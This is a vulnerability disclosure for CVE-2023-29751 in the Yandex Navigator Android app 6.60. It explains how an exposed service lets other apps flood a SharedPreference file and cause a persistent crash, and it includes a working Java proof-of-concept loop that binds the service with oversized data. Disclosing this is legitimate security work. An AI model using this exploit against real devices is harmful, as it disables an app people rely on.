CVE-2023-29751: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

Denial of Service exists in Yandex Navigator（CVE-2023-29751）

Vendor: Yandex (https://yandex.com/)

Affected product: Yandex Navigator(ru.yandex.yandexnavi)

Version: 6.60

Download link：https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1

Description of the vulnerability for use in the CVE：An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

while (true) { ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", “ru.yandex.common.clid.ClidService”); Intent intent = new Intent(); intent.setComponent(componentName); intent.putExtra("service_version", 0); intent.setAction(“ru.yandex.common.clid.update_preferences”); intent.putExtra("preferences", “STORAGE”); intent.putExtra("application", “ru.yandex.yandexnavi”); Bundle bundle = new Bundle(); Bundle bundle2 = new Bundle(); Bundle bundle3 = new Bundle(); String randomString = getRandomString(50240); bundle2.putString(randomString, randomString); bundle3.putLong(randomString, Long.MAX_VALUE); bundle.putBundle("bundle-values", bundle2); bundle.putBundle("bundle-time", bundle3); intent.putExtra("bundle", bundle); ServiceConnection connection = new ServiceConnection() { @Override public void onServiceConnected(ComponentName name, IBinder service){

    }
    @Override
    public void onServiceDisconnected(ComponentName name) {
        
    }
};
bindService(intent,connection,BIND\_AUTO\_CREATE);

}